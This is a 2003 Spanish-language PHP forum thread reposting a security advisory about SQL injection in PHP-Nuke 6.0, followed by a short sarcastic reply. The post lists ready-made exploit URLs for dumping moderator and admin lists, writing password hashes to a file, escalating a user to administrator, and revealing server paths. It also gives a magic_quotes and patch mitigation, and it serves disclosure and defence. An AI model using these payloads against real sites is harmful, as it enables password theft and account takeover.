Foros del Web » Programando para Internet » PHP »

problema de seguridad en php-nuke

Estas en el tema de problema de seguridad en php-nuke en el foro de PHP en Foros del Web. Hola, he visto esta noticia y me ha parecido importante, por eso la pongo aqui (espero que eso no vaya en contra de las politicas ...
  #1 (permalink)  
Antiguo 10/03/2003, 18:06
Avatar de kctus
Usuario baneado!
 
Fecha de Ingreso: noviembre-2002
Ubicación: ToledoBsAsGaliciaBolivia
Mensajes: 1.038
Antigüedad: 15 años, 1 mes
Puntos: 1
problema de seguridad en php-nuke

Hola, he visto esta noticia y me ha parecido importante, por eso la pongo aqui (espero que eso no vaya en contra de las politicas del foro, etc)

------------------------
PHP-Nuke 6 y posiblemente superiores es vulnerable a varios ataques de inyección de código que permitiría el acceso a datos sensibles y/o la manipulación de la base de datos, según informó Hispasec.

PHP-Nuke es un sistema de publicación basado en PHP muy popular entre los portales de Internet. La vulnerabilidad, detectada en la versión 6.0, está causada por un error de validación de entrada en los módulos "Members_List" y "Your_Account" y será únicamente explotable cuando php esté configurado con "magic_quotes_gpc=OFF" (normalmente en php.ini).
Unos ejemplos de como explotar esta problema:

* Listado de moderadores:

http://[victima]/modules.php?name=Members_List&letter='%20OR%20user _leve l='2'/*

* Listado de administradores:

http://[victima]/modules.php?name=Members_List&letter='%20OR%20user _leve l='4'/*

* Creación de un archivo con todas los claves encriptadas:

http://[victima]/modules.php?name=Your_Account&op=mailpasswd&uname= ')%20 OR%201=1%20INTO%20OUTFILE%20'/[directorio]/Claves.txt'/*

http://[victima]/Claves.txt

* Elevación de privilegios:

http://[victima]/modules.php?name=Your_Account&op=savehome&broadcas t=',u ser_level='4&uid=[NUESTRO_UID]

* Revelación de directorio local:

http://[victima]/modules/Forums/bb_smilies.php

Una solución rápida a este problema, si tienes acceso a la configuración de php, sería editar el php.ini y activar la opción "magic_quotes_gpc=ON". En caso contrario en estos momentos ya existen parches en el web oficial.
  #2 (permalink)  
Antiguo 11/03/2003, 09:19
 
Fecha de Ingreso: febrero-2002
Ubicación: ¿donde vivo? pues en mi casa, ¿donde voy a vivir?...
Mensajes: 214
Antigüedad: 15 años, 9 meses
Puntos: 0
phpnuke tiene fallos como ese, y peores CONSTANTEMENTE.

en cualquier caso, aki casi nadie usa phpholeinabucket...
__________________
Linux, es para los que odian Microsoft/Windows, BSD, es para los que amamos *IX.
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 21:09.